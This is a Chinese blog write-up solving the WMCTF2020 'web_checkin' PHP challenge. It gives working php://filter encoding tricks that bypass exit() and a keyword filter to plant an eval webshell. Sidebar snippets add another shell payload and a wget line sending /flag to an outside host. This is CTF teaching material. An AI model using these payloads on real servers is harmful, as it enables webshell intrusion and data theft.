WMCTF2020 web之web_checkin完整题解

已于 2023-03-23 18:26:32 修改
阅读量822 收藏 5
点赞数 3
文章标签: php web安全 网络安全 安全 网络
于 2023-03-17 23:43:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38338511/article/details/129630326
版权

题目源码

<?php
//PHP 7.0.33 Apache/2.4.25
error_reporting(0);  //不会报错
$sandbox = '/var/www/html/sandbox/' . md5($_SERVER['REMOTE_ADDR']);  //这个不用在意,就是md5加密一个路径的值
@mkdir($sandbox);    //创建目录
@chdir($sandbox);    //进入目录
var_dump("Sandbox:".$sandbox);    //输出路径
highlight_file(__FILE__);         //高亮所有代码
if(isset($_GET['content'])) {     //判断content是否传参
    $content = $_GET['content'];  //传参后赋值给content
    if(preg_match('/iconv|UCS|UTF|rot|quoted|base64/i',$content))   //判断content是否有这些字符 /i是大小写都匹配
         die('hacker');   //结束
    if(file_exists($content))    //判断content的文件是否存在
        require_once($content);	 //包含
    file_put_contents($content,'<?php exit();'.$content); //写入一个content文件,内容是<?php exit();加上$content
}

首先要解决的是$content要传入什么可以绕过exit()

<?php exit();$content

可以将代码改变一下

<?php
show_source(__FILE__);
$content = $_GET['content'];
$data = '<?php exit();?> ' . $content;
file_put_contents($content,$data);

我们可以利用php://filter字符串处理方法&&编码的方法绕过<?php exit();

这里就用UCS-2和Rot13过滤举个例子

<?php
#demo_0.php
error_reporting(0);   //不影响运行结果,只是不会再报错
$content = "php://filter/write=convert.iconv.UCS-2LE.UCS-2BE|string.rot13|x?<uc cucvcsa(b;)>?/resource=shell.php";
$data = '<?php exit();'.$content;
file_put_contents($content,$data);

php demo_0.php 运行后会在当前目录生成一个shell.php

此时成功运行phpinfo();

这里用的是UCS-2,当然我们也可以用UCS-4 (在这就不多举例了) ,也有常见的办法,base64和strip_tags等等,但是会有弊端。

你可能会想到phpinfo();是怎么构造?如何改成自己想要的一句话木马呢?

PHP协议中间有一段:

x?<uc cucvcsa(b;)>?   ==   <?php phpinfo();?>

用PHP UCS-2和Rot13编码/解码脚本

<?php
$a =  iconv("UCS-2LE","UCS-2BE",'<?php phpinfo();?>');
echo "x".str_rot13($a);
#x?<uc cucvcsa(b;)>?
?>

改成自己的一句话木马就行了

回到本题。明显过滤了很多,但是我们可以用二次编码绕过,因为file_put_contents中调用伪协议,会对过滤器url解码一次

将字符二次编码 

<?php 
$char = 'u';
for ($ascii1 = 0; $ascii1 < 256; $ascii1++) { 
    for ($ascii2 = 0; $ascii2 < 256; $ascii2++) { 
        $a = '%'.$ascii1.'%'.$ascii2; 
        if(urldecode(urldecode($a)) == $char){ 
            echo $char.': '.$a; 
        } 
    } 
} 
?>

绕过preg_match函数

if(preg_match('/iconv|UCS|UTF|rot|quoted|base64/i',$content))

 构造pyload

?content=php://filter/write=convert.%6%39conv.%7%35CS-2LE.%7%35CS-2BE|string.%7%32ot13|x?<uc ciryn$(C_FB[G66]6;)>?/resource=xg.php

访问http://ip/sandbox/c47b21fcf8f0bc8b3920541abd8024fd/xg.php 密码666

蚁剑连接

flag{b6515f13-2b4a-49da-8e80-d55732c1b0bb}

小古_
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
glados_checkin
03-25
glados定时签到
buu-day09
anwen12的博客
01-26 525
Day9-懒狗来打卡了 0x01 [WMCTF2020]Web Check in 2.0 绕过死亡exit,这是基本操作了,但是需要找到新的过滤器。懒狗想到这里就去看wp了。 =php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=6.php 还有一种方法是segment,就是那个qwb2021才考过的知识点。需要爆破,就不多说了 0x02 [CISCN2019
[WMCTF2020]Web Check in 2.0
qq_62078839的博客
04-16 1535
启动靶机,打开发现源码 string(62) "Sandbox:/var/www/html/sandbox/cc551ab005b2e60fbdc88de809b2c4b1" <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/sandbox/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); var...
WMCTF2020 webweb_checkin
Firebasky的博客
08-04 2639
这道题是自己没有做出来,当时也没有认真做,最后看看来NU1L的wp才知道思路。 NU1L真的太强了,向他们看齐!!! 题目:web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);//remote_addr代表客户端的IP @mkdir($sandbox);//创建一个文件 @chdir($sandbox);.
BUUCTF_web_checkln
vegetable_haker的博客
10-11 825
BUUCTF_web_checkln方法步骤 方法 利用.user.ini隐藏后门。配置项auto_prepend_file 会让php文件在执行前先包含一个指定的文件,通过这个配置项,我们就可以来隐藏自己的后门 步骤 1.新建文件.user.ini,写入 GIF89a //绕过exif_imagetype() auto_prepend_file=test.jpg...
PHP Filter伪协议Trick总结
gental_z的博客
01-04 8682
PHP Filter伪协议Trick总结 前言:最近在学习的过程中碰到了很多的filter协议的小trick,在此做一个总结以及对filter协议的一些探索。 PHP Filter协议介绍 ​ php://filter是php中独有的一种协议,它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。官方解释为: php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这
HRMS_Employee_checkIn_checkOut
02-09
本系统“HRMS_Employee_checkIn_checkOut”主要关注员工的签到签退功能,其核心技术是利用JavaScript进行前端开发,实现了用户友好的交互界面和实时的数据处理。 JavaScript是一种广泛应用于网页和网络应用的脚本...
daily_checkin.zip
01-07
【标题】"daily_checkin.zip" 是一个包含脚本的压缩包,用于自动完成天翼云的每日签到任务,并且据描述在2022年1月7日时已经经过了测试,证明是可用的。这个压缩包可能对那些需要定期在天翼云平台签到并领取额外存储...
tongji_checkin
03-04
【同济大学健康打卡自动脚本--GitAction版】是一个基于Python编程语言的自动化工具,专为同济大学的学生或教职工设计,旨在简化每日的健康打卡流程。此脚本利用了GitAction,一个GitHub的动作(Actions)服务,使得...
ZJBTI_COVID-19_Checkin
03-09
浙工商“疫情自动签到”介绍使用GitHub动作自动化执行浙江工商职业技术学院疫情签到。触发方式点亮星凌晨1点定时执行自定义:.github / workflows / main.yaml编辑注意:如果身体状况异常,请立即上报本项目不承担...
WMCTF_2020官方WriteUp 高清PDF版
10-15
WMCTF_2020官方WriteUp.pdf WMCTF_2020官方WriteUp 高清PDF版
2020 年 V&N 内部考核赛 WriteUp
12-22
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # return flag ## want flag? naive! # You will never find the thing you want:) I think @app.route('/she
陇原战“疫“2021网络安全大赛 Web CheckIN
Sk1y的博客
12-24 3205
checkin 文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接 参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入 题目有附件 下载,是个go语言,审计一下 ,文件目录如下 注意wget 还有 wget外带数据 根据上面的博客,可以执行命令wegt数据外带出来 wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/ 然后既可以得到flag
wmctf web部分wp(非官方qwq
shadowwolf’s blog
08-04 1734
web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); highlight_file(__FILE__); if(isset($_GET['content'])) { $content = $_GET['content'];
2020WMCTF cfgo_CheckIn题解
starssgo的博客
08-03 986
周六周日刚打了打,战队里一共出了两道题。分别是cfgo_CheckIn跟mengyedekending。我的话是一直在做cfgo_CheckIn,mengyedekending由战队里的whalien51冲出来的。我暂时没有复现。就先写下这个cfgo_CheckIn的wp 详细解释的话放到我的博客站上 不太明白的湿傅们可以去我的博客上看下具体实现 思路 编写破解迷宫算法,然后栈溢出就行了。 # -*- coding: utf-8 -* from pwn import * from LibcSearcher
4 web wp
TMNOA的博客
04-23 136
流年似水
PolarCTF春季个人挑战赛 2024 WEB
最新发布
konpure的博客
03-27 1042
又是反序列化的题目,入口应该是Polar类中的__wakeup()魔术方法,反序列化过程中如果没有改变O的个数该方法会被优先调用,同时该方法中调用了一个不存在的方法hacker(),由此就会触发Night类中的__call类魔术方法,同时该方法中的echo语句又可实现将类当成字符串调用,以此触发__toString()魔术方法,由于该方法中将flag替换成了空,我们可以尝试使用双写绕过,具体POC如下。方法,形成变量覆盖,具体的poc如下。好好好,又是折腾半天没弄出来的,摆了,日后再补上。
GKCTF web-CheckIN 解题思路writeup
qq_41743240的博客
05-24 1037
打开题目可以看到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin
i春秋2020新春疫战 非SQL题目解析
a3320315的博客
02-25 1175
Ezupload 这道题目可能是师傅的失误,在上传后缀名过滤的数组中有一些失误~~ 导致直接上传php马,得到flag~~ 这儿贴一下上传shell查看的源码 <?php error_reporting(0); header("Content-type: text/html; charset=utf-8"); $sandbox='sandbox/'.md5($_SERVER['remote_...
result = pd.DataFrame({'第一次打卡时间': first_checkin, '最后一次打卡时间': last_checkin})
04-04
As an AI language model, I don't have the context to understand what kind of data is being analyzed here. However, based on the given code, it seems like a pandas DataFrame is being created with two columns: '第一次打卡时间' (first_checkin) and '最后一次打卡时间' (last_checkin). The data for these columns is not provided in the given code.
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小古_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值